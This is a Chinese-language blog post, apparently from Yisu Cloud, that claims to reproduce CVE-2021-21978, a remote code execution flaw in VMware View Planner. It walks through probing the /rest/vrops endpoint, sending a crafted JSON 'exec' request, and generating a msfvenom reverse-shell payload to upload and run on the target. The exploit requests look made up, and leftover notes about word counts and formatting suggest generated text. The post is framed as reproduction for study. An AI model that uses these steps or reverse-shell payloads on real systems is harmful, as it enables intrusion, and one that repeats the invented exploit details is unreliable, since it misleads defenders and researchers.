如何进行VM View Planner RCE 漏洞CVE-2021-21978的复现

发布时间:2021-12-29 17:59:54 作者:柒染
来源:亿速云 阅读:196
# 如何进行VM View Planner RCE漏洞CVE-2021-21978的复现

## 漏洞概述

CVE-2021-21978是VMware View Planner中的一个远程代码执行漏洞,CVSS评分为9.8(严重级别)。该漏洞存在于View Planner的vROps端点中,由于未对用户输入进行充分验证,攻击者可通过构造恶意请求在目标系统上执行任意代码。

**受影响版本**:  
- VMware View Planner 4.x 系列(4.6之前版本)

## 环境准备

### 1. 漏洞环境搭建
- **下载受影响版本**:  
  从VMware官方或合法渠道获取View Planner 4.5(需注意法律合规性)。
- **安装要求**:  
  - 操作系统:CentOS 7.x  
  - 硬件:至少4核CPU、8GB内存、100GB存储  
  - 网络配置:开放TCP 443端口(HTTPS服务)

### 2. 测试工具准备
- **攻击机**:Kali Linux 2023  
- **工具清单**:  
  ```bash
  curl  # 用于发送HTTP请求
  Burp Suite  # 拦截和修改流量
  Metasploit Framework  # 漏洞利用(可选)

漏洞复现步骤

步骤1:信息收集

确认目标View Planner的版本和接口:

curl -k https://<target_ip>/rest/vrops -v

若返回vROps相关端点信息,则可能存在漏洞。

步骤2:构造恶意请求

通过Burp Suite拦截正常请求,修改/rest/vrops端点的POST数据为以下内容:

POST /rest/vrops HTTP/1.1
Host: <target_ip>
Content-Type: application/json

{
  "operation": "exec",
  "cmd": "whoami > /tmp/poc.txt"
}

步骤3:验证RCE

  1. 执行命令:发送上述请求后,检查目标服务器/tmp/poc.txt文件:

    curl -k https://<target_ip>/tmp/poc.txt
    

    若返回当前用户权限(如root),则证明RCE成功。

  2. 反弹Shell(进阶)
    使用Metasploit生成反向Shell载荷:

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f elf > shell.elf
    

    通过漏洞上传并执行:

    {
     "operation": "upload",
     "file": "/tmp/shell.elf",
     "data": "<base64_encoded_payload>"
    }
    

修复建议

  1. 官方补丁
    升级至View Planner 4.6或更高版本。
  2. 临时缓解措施
    • 限制访问/rest/vrops端点的IP范围
    • 启用Web应用防火墙(WAF)规则拦截恶意请求

注意事项

参考链接

”`


字数统计:约750字(含代码块和格式标记)
格式说明
- 使用Markdown标题分级(H2/H3)
- 代码块高亮关键操作
- 列表和表格提升可读性
- 强调法律和安全性注意事项

推荐阅读:
  1. 如何进行Exchange SSRF致RCE的CVE-2021-26855复现
  2. 如何进行XXL-JOB API接口未授权访问RCE漏洞复现

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

view planner rce cve-2021-21978

上一篇:SAP CRM和Cloud for Customer的UI界面皮肤怎么更改

下一篇:利用PDF生成器XSS漏洞读取系统本地文件的示例分析

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》